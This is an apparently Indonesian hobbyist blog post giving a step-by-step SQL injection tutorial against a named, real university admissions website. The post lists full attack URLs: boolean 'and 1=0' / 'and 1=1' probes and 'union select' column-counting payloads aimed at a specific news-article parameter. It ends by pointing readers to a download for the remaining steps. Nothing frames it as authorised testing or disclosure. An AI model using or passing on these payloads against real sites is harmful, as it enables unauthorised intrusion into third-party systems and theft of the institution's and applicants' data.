Jumpa lagi dengan saya, seorang cupu & orang awam ttg dunia hacking. Kali ini saya akan menjelaskan bugs pada website UMM (Univ. Muhammadiyah Malang) dengan cara SQL Injection >:). Mudah-mudahan langkah yg saya jelaskan tidak salah. Ok, lanjut aja ga banyak bacot…

Buka http://pmb.umm.ac.id/ , sekarang pilih artikel apa aja pada website tersebut. Saya pilih artikel berita, yaitu http://pmb.umm.ac.id/?lihat=1&id_berita=116

Lalu tambahkan dibelakangnya “ and 1=0” (tanpa tanda petik), sehigga menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=116 and 1=0, hal ini untuk mengetes apakah site tersebut bisa di inject atau ga’.

Ada yang aneh saat mebuka URL tersebut? Apakah tulisan pada halaman websitenya hilang?....

Lanjut, sekarang coba tambahkan dibelakangnya “ and 1=1” (tanpa tanda petik), sehingga menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=116 and 1=1

Apakah ada perbedaan dengan yg kita lakukan tadi? Kalau ada perbedaan berarti website tersebut bisa di-inject >:)

Sekarang tambah alamat id-nya (-), menjadi http://pmb.umm.ac.id/?lihat=1&id_berita=-116

Lalu masukkan “union select 1--” --> http://pmb.umm.ac.id/?lihat=1&id_berita=-116 union select 1--

Masukkan lagi “union select 1,1--” --> http://pmb.umm.ac.id/?lihat=1&id_berita=-116 union select 1,1--

Lanjutkan langkah diatas dengan menambahkan angka 1 sampai keluar pada halaman site-nya angka 1 bederet, dan ternyata cukup sampai menambahkan 1-nya 4x udah muncul angka 1 bederet 3 biji, nih URLnya http://pmb.umm.ac.id/?lihat=1&id_berita=-116%20union%20select%201,1,1,1,1--

.... Penasaran? Kalo penasaran silahkan dibaca dg mendownload artikel tersebut disini

Bagi para master, saya tidak merekomendasikan untuk dibaca :D